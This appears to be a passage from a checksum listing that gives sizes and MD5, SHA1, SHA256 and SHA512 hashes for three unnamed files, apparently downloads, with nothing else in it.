SHA512: ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00
-
Filesize: 1.7MB
MD5: f8d8b67dfcec2684e96122cb9aea4daf
SHA1: 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256: 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA512: 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6
-
Filesize: 4.5MB
MD5: c7a7b834e68cece0ac292bc991af7908
SHA1: bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256: 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA512: 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3
-
Filesize: 391KB
MD5: be4cd92e14c0d3235ecaf4f10d7aa68a
SHA1: ddc908db9c225329c836244feec47b8b2e5d989d
SHA256: 05fbe015ae3610d931f7d3a0d188fc34f95b60de008116a2d57db248ccef7f28
SHA512: 473e1eab87b6ea8c58b7291e23aee84927bfa02825819c9725b070e92349ec2dc2749cd49facdc33334117609b49b1c9fddcf94a4d99d5a36a20ec5b11a6502a